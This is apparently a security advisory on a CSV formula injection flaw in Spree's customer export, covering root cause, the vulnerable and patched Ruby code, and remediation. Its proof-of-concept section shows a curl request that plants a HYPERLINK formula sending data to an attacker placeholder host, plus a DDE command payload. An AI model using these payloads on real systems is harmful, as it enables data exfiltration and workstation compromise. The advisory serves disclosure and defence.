GHSA-XF4V-W5X5-PV79
GHSA-XF4V-W5X5-PV79: CSV Formula Injection in Spree Customer Export
Alon Barad
Software EngineerJun 4, 2026·6 min read·4 visits
Executive Summary (TL;DR)
Unauthenticated users can inject malicious spreadsheet formulas into customer profile fields in Spree. When an administrator exports customer data to CSV and opens it in Microsoft Excel or LibreOffice, the formulas can execute arbitrary commands or silently exfiltrate sensitive data.
A CSV Formula Injection vulnerability (CWE-1236) exists in the Spree headless eCommerce platform within the customer export functionality. An unauthenticated attacker can register a customer profile containing malicious formula sequences in fields like the first name or last name. When an administrator exports the customer data to a CSV file and opens it in a spreadsheet application, the spreadsheet engine can interpret and execute these formulas, potentially leading to remote command execution on the administrator's workstation or out-of-band data exfiltration.
Vulnerability Overview
Spree is an open-source, headless e-commerce framework written in Ruby on Rails. A security vulnerability has been identified in Spree's customer export utility, which generates comma-separated values (CSV) files containing user registration data. This flaw permits unauthenticated actors to register customer profiles containing malicious payloads that run inside spreadsheet applications like Microsoft Excel or LibreOffice Calc.
This vulnerability is classified as CWE-1236: Improper Neutralization of Formula Elements in a CSV File, also known as CSV Injection. The attack surface is exposed via the public registration endpoint, which takes raw text data for fields such as the first name, last name, and shipping address, and commits it directly to the database.
The vulnerability is unique because it spans security boundaries. The injection occurs on the e-commerce server, but the execution happens on the local environment of the administrator processing the export. While the web application itself remains undamaged, the administrative workstation is at high risk of compromise, including command execution and local data leakage.
Root Cause Analysis
The underlying root cause is the lack of normalization of user-provided data fields inside the serialization process. Specifically, the CustomerPresenter class in spree/core/app/presenters/spree/csv/customer_presenter.rb constructs an array containing raw attributes of the Customer object, such as first_name, last_name, and address lines.
When CustomerPresenter#call is executed during a background customer export task, the attributes are formatted verbatim into an array and appended to the final output file stream. Although the standard Ruby CSV library handles structural escaping (such as wrapping values containing commas inside double quotes), it does not check or alter the leading characters of each cell.
Spreadsheet software interprets cells starting with =, +, -, @, \t, or \r as formulas rather than raw text. By default, these application engines attempt to parse and evaluate the formulas to compute cell values dynamically. Because Spree does not prepend safe escape characters to these fields prior to export, the client-side spreadsheet engine executes the injected expressions as trusted code.
Code Analysis
The vulnerable implementation of CustomerPresenter#call receives attributes directly from the database and constructs a raw array. This array represents the flat structure of the exported CSV row. There is no filter applied to sanitize or escape leading characters.
# Vulnerable customer_presenter.rb
def call
csv = [
customer.first_name,
customer.last_name,
customer.email,
customer.accepts_email_marketing ? Spree.t(:say_yes) : Spree.t(:say_no),
customer.address&.company,
customer.address&.address1,
# ... other address fields ...
customer.phone,
customer.amount_spent_in(Spree::Store.current.default_currency),
customer.completed_orders.count,
]
csv += metafields_for_csv(customer)
csv
endThe corresponding patch introduces a dedicated helper method named sanitize_csv that sanitizes all exported values. It loops through the constructed array using .map and prefixes a single quote character (') to any string that begins with a known formula trigger.
# Patched customer_presenter.rb
def call
raw_csv = [
customer.first_name,
customer.last_name,
customer.email,
customer.accepts_email_marketing ? Spree.t(:say_yes) : Spree.t(:say_no),
customer.address&.company,
customer.address&.address1,
# ... other fields ...
].map { |field| sanitize_csv(field) }
raw_csv += metafields_for_csv(customer).map { |field| sanitize_csv(field) }
raw_csv
end
private
def sanitize_csv(field)
return field unless field.is_a?(String)
if field.start_with?('=', '+', '-', '@', "\t", "\r")
"'#{field}"
else
field
end
endThis remediation successfully prevents execution under standard parsing engines. However, standard string checks like .start_with? can fail to identify bypass payloads that place newline characters (\n) ahead of the formula trigger if the parser treats them leniently. Developers should clean the output elements of all non-printable and control characters before performing checks.
Exploitation & Proof-of-Concept
Exploitation of this vulnerability requires two phases: input injection by an unauthenticated attacker and spreadsheet execution by an authenticated administrator. To begin, the attacker registers a new account on the public store portal, passing a crafted formula string in the first_name field.
curl -X POST https://store.example.com/api/v3/store/customers \
-H "Content-Type: application/json" \
-d '{
"email": "malicious@attacker.example.com",
"password": "SecurePass123",
"first_name": "=HYPERLINK(\"http://attacker.example.com/log?exfil=\"&C2,\"Confirm\")",
"last_name": "User"
}'When the export utility generates the CSV, the string is saved to the disk. Once the administrator downloads the CSV and opens it in Microsoft Excel, the program automatically parses =HYPERLINK as a functional formula. When the administrator clicks the link or allows dynamic evaluation, the application triggers an HTTP GET request containing adjacent cell values (such as the target email in column C) back to the attacker-controlled logging server.
On legacy or specifically configured spreadsheet engines, attackers can leverage the Dynamic Data Exchange (DDE) protocol. This protocol allows execution of local operating system commands. An attacker can use payloads like =cmd|' /C calc'!A1 to spawn a subprocess, bypassing traditional host-based execution controls and potentially compromising the administrative workstation.
Impact Assessment & Threat Modeling
The localized severity of the vulnerability is low for the web application platform itself, but critical for the administrative user's environment. The Spree application database and server memory are not corrupted during the export, meaning the main application maintains integrity and availability.
However, because administrative personnel regularly process customer data from high-privilege endpoints, they are prime targets for social engineering and client-side exploits. Successful compromise of an administrator's machine via command execution allows an attacker to extract administrative API keys, browser cookies, and local credentials stored on the workstation.
Additionally, silent exfiltration is highly realistic. Attackers do not need to execute arbitrary commands to achieve high-impact outcomes. They can exfiltrate sensitive customer lists, purchase patterns, physical addresses, and order histories through basic HYPERLINK callbacks, causing significant data exposure and privacy violations.
Remediation & Defensive Guidance
Remediation requires immediate upgrades of the spree library to a patched release. Ensure that your application is utilizing 5.2.8, 5.3.6, or 5.4.3 depending on your current major release channel. Run the following command to update Spree via Bundler:
bundle update spreeIf upgrading immediately is not feasible, administrators can apply a localized monkey-patch to the CustomerPresenter class in an initializer file. This patch should replicate the sanitize_csv behavior, ensuring that all string values beginning with =, +, -, @, \t, or \r are prepended with a single quote character.
Furthermore, security teams should configure endpoint protection tools and office productivity software on staff workstations to block Dynamic Data Exchange (DDE) execution requests. This prevents Excel and similar programs from invoking system shells (powershell.exe, cmd.exe) when opening files generated by external platforms.
Technical Appendix
CVSS Score
5.1/ 10
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:HAffected Systems
Spree Commerce headless platform (RubyGems package 'spree')
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
spree Spree Commerce | >= 5.2.0, < 5.2.8 | 5.2.8 |
spree Spree Commerce | >= 5.3.0, < 5.3.6 | 5.3.6 |
spree Spree Commerce | >= 5.4.0, < 5.4.3 | 5.4.3 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-1236 |
| Attack Vector | Network (Unauthenticated) |
| CVSS v4.0 Score | 5.1 (Medium) |
| Exploit Status | Proof-of-Concept |
| Impact | Workstation Compromise / Data Leakage |
| Affected Component | Spree::Csv::CustomerPresenter |
MITRE ATT&CK Mapping
CWE-1236
Improper Neutralization of Formula Elements in a CSV File
The software saves user-controlled data into a CSV format without neutralizing characters that can be interpreted as formula triggers.
Vulnerability Timeline
GHSA-XF4V-W5X5-PV79 published detailing Spree CSV Formula Injection
2026-06-04
Patches integrated and released across active branches (v5.2.8, v5.3.6, v5.4.3)
2026-06-04
